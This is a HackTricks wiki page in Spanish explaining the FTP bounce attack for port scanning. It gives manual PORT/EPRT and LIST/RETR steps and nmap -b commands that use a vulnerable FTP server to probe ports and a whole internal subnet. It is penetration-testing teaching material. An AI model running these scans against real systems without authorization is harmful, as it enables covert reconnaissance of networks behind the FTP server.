Ataque de rebote FTP - Escaneo
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Rebote FTP - Escaneo
Manual
- Conéctate al FTP vulnerable
- Usa **
PORT
** oEPRT
(pero solo uno de ellos) para establecer una conexión con el <IP:Puerto> que deseas escanear:
PORT 172,32,80,80,0,8080
EPRT |2|172.32.80.80|8080|
- Usa
LIST
(esto solo enviará a la <IP:Puerto> conectada la lista de archivos actuales en la carpeta FTP) y verifica las posibles respuestas:150 File status okay
(Esto significa que el puerto está abierto) o425 No connection established
(Esto significa que el puerto está cerrado) - En lugar de
LIST
, también podrías usarRETR /file/in/ftp
y buscar respuestas similares deOpen/Close
.
Ejemplo usando PORT (el puerto 8080 de 172.32.80.80 está abierto y el puerto 7777 está cerrado):
Mismo ejemplo usando EPRT
(autenticación omitida en la imagen):
Puerto abierto usando EPRT
en lugar de LIST
(entorno diferente)
nmap
bash
nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.